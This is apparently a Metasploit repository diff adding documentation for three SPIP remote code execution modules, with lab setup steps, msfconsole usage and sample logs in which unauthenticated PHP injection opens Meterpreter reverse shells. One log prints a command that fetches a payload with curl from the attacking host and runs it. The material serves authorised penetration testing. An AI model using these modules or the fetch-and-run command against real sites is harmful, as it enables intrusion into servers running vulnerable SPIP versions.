rapid7 · dwelch-r7 · Sep 11, 2024 · Aug 30, 2024 · Aug 30, 2024 · Aug 30, 2024
diff --git a/documentation/modules/exploit/multi/http/spip_connect_exec.md b/documentation/modules/exploit/multi/http/spip_connect_exec.md
@@ -0,0 +1,146 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection vulnerability in SPIP.
+The vulnerability exists in the `connect` parameter, allowing an unauthenticated
+user to execute arbitrary commands with web user privileges.
+Branches 2.0, 2.1, and 3 are affected.
+Vulnerable versions are < 2.0.21, < 2.1.16, and < 3.0.3.
+This module is compatible with both Unix/Linux and Windows platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20
+on Apache running on Ubuntu, Fedora, and Windows Server.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/SPIP-v2-0-0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp SPIP-v2-0-0.zip spip-site/ 
+cd spip-site/ 
+unzip SPIP-v2-0-0.zip
+```
+
+Install PHP 5.6 and the necessary extensions:
+
+1. Add the PPA for PHP 5.6:
+
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+```
+
+2. Install PHP 5.6 with SQLite extensions:
+
+```
+sudo apt-get install php5.6 php5.6-sqlite php5.6-sqlite3
+```
+
+3. Enable the required extensions in the PHP configuration file:
+
+Open the PHP INI file for CLI:
+
+```
+sudo nano /etc/php/5.6/cli/php.ini
+```
+
+Add or uncomment the following lines:
+
+```
+extension=sqlite3.so
+extension=pdo_sqlite.so
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php5.6 -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/spip_connect_exec`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+
+No options
+
+## Targets
+
+### 0 (PHP In-Memory)
+
+This uses an in-memory PHP payload to execute code.
+
+### 1 (Unix/Linux Command Shell)
+
+This executes a Unix or Linux command.
+
+### 2 (Windows Command Shell)
+
+This executes a Windows command.
+
+## Scenarios
+
+### SPIP 2.0.0 - Linux target - PHP In-Memory
+
+```
+msf6 exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 2.0.0
+[+] The target appears to be vulnerable.
+[*] 192.168.1.36:8000 - Attempting to exploit...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:47020) at 2024-08-22 19:19:00 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+### SPIP 2.0.0 - Unix/Linux Command Shell
+
+```
+msf6 exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 2.0.0
+[+] The target appears to be vulnerable.
+[*] 192.168.1.36:8000 - Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:32794) at 2024-08-22 19:20:41 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### SPIP 2.0.0 - Windows Command Shell
+
+```
+Somehow, I was unable to obtain a remote code execution (RCE) on my lab environment using the Windows Command Shell target. 
+However, based on the exploit's design and its success on other platforms, it is expected to work. 
+The issue might be specific to my lab setup.
+```
diff --git a/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md b/documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
@@ -121,40 +121,51 @@ exploit
 With `php/meterpreter/reverse_tcp`:
 
 ```
-msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > run http://127.0.0.1:8000
 
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] SPIP Version detected: 4.2.12
-[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
+[+] SPIP version 4.2.12 is vulnerable.
+[*] Porte plume plugin version detected: 3.1.5
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.2.12) and bigup version (3.1.5) are vulnerable.
 [*] Preparing to send exploit payload to the target...
 [*] Sending exploit payload to the target...
 [*] Sending stage (39927 bytes) to 192.168.1.36
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:56534) at 2024-08-19 19:43:18 +0200
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.36:43974) at 2024-09-08 06:46:50 +0200
 
 meterpreter > sysinfo 
 Computer    : linux
-OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+OS          : Linux linux 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
 Meterpreter : php/linux
 ```
 
 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
 ```
-msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > run http://127.0.0.1:8000
 
+[*] Command to run on remote host: curl -so ./gYBuGbOLFH http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA; chmod +x ./gYBuGbOLFH; ./gYBuGbOLFH &
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] SPIP Version detected: 4.2.12
-[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
+[+] SPIP version 4.2.12 is vulnerable.
+[*] Porte plume plugin version detected: 3.1.5
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.2.12) and bigup version (3.1.5) are vulnerable.
 [*] Preparing to send exploit payload to the target...
 [*] Sending exploit payload to the target...
+[*] Client 192.168.1.36 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 192.168.1.36 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
 [*] Sending stage (3045380 bytes) to 192.168.1.36
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.36:59106) at 2024-08-19 19:44:40 +0200
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.36:60244) at 2024-09-08 06:47:47 +0200
 
 meterpreter > sysinfo 
 Computer     : 192.168.1.36
-OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+OS           : LinuxMint 21.3 (Linux 5.15.0-119-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

diff --git a/documentation/modules/exploit/multi/http/spip_rce_form.md b/documentation/modules/exploit/multi/http/spip_rce_form.md
@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection in SPIP. The vulnerability exists in
+the `oubli` parameter and allows an unauthenticated user to execute arbitrary
+commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
+concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
+
+The module's `check` method attempts to obtain the SPIP version via a simple HTTP GET request to `/spip.php`
+page and fingerprints it either via the `generator` meta tag, or by the
+`Composed-By` header.
+
+This module has been successfully tested against SPIP version 4.0.0.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp spip-v4.2.0.zip spip-site/ 
+cd spip-site / 
+unzip spip-v4.2.0.zip
+```
+
+Install php and the necessary extensions:
+
+```
+sudo apt install -y php-xml php-zip php-sqlite3
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/spip_rce_form`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+
+No options
+
+## Targets
+
+### 0 (PHP In-Memory)
+
+This uses an in-memory PHP payload to execute code.
+
+### 1 (Unix/Linux Command Shell)
+
+This executes a Unix or Linux command.
+
+### 2 (Windows Command Shell)
+
+This executes a Windows command.
+
+## Scenarios
+### SPIP 4.2.0 - Linux target - PHP In-Memory
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
+[*] 127.0.0.1:8000 - Attempting to exploit...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.36:36488) at 2024-08-22 15:01:39 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### SPIP 4.2.0 - Unix/Linux Command Shell
+
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
+[*] 127.0.0.1:8000 - Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.36:46044) at 2024-08-22 15:03:31 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### SPIP 4.2.0 - Windows Command Shell
+
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://192.168.1.48
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: Z1kE0G5FLDrWkF9cvFp5ZuEKbtEjqIxoWTXL9HxYFP/xXeUohvYklG+kfLo32Cas24teZEJVX4e10CE5HEAjZ4HpM7VAUZoh
+[*] 192.168.1.48:80 - Attempting to exploit...
+[*] Sending stage (201798 bytes) to 192.168.1.48
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.48:50092) at 2024-08-22 14:59:16 +0200
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-NHU31ET
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : fr_FR
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+```